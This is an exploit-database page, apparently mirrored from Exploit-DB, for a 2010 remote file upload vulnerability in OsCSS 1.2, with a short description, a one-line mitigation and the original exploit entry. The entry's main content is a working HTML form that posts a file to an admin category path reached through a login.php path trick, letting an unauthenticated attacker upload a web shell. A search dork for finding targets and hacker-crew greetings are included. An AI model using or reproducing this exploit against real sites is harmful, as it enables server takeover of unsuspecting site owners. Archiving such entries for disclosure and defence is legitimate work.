header-logo
Suggest Exploit
vendor:
OsCSS
by:
Shichemt Alen
9,3
CVSS
HIGH
Remote File Upload
434
CWE
Product Name: OsCSS
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: No
Related CWE: None
CPE: None
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2 DE & Ubuntu 10.10
2010

OsCSS Remote File Upload Exploit

A malicious user can upload a shell to the vulnerable OsCSS application by using a specially crafted HTML form. The form should be sent to the vulnerable URL http://localhost/admin/categories.php/login.php?action=insert_category&cPath= with the enctype set to multipart/form-data and the input type set to file. The malicious user can then upload a shell to the vulnerable application.

Mitigation:

Ensure that the application is properly configured to prevent unauthorized file uploads.
Source

Exploit-DB raw data:

# Exploit Title: OsCSS Remote File Upload Exploit
# Date: 12-1-2010
# Author: Shichemt Alen
# Software Link: None
# Version: 1.2
# Platform / Tested on: Windows XP SP2 DE & Ubuntu 10.10
# category: webapps/0day
# Dork : inurl:"sorry script'kiddies"
# Contact : shichemt@hotmail.com - http://www.shichemt-alen.com/


#Exploit :
Upload Shell

<html><head><title>Shell Upload</title></head>
<br><br><u>Upload Shell:</u><br>
<form name="file" action="http://localhost/admin/categories.php/login.php?action=insert_category&cPath=" method="post" enctype="multipart/form-data">
<input type="file" name="categories_image"><br>
<input name="submit" type="submit" value="   Upload   " >
</form>
<center>
<a href="http://www.shichemt-alen.com/">Shichemt-Alen © 2010</a>
</center></html>



############ Made in Tunisia +216 ############

Greets to :  Geeks Team {Pr0t3ct0r,Hamed, K-D0vic, Mid0vik, UbunBoy}

-----------------------

xTobi, Net-Own3r, Wx, BosnianTREX, Number7, Ghost-tn and All Friends...

& All Tunisian and Muslim Hackers...


############ Made in Tunisia +216 ############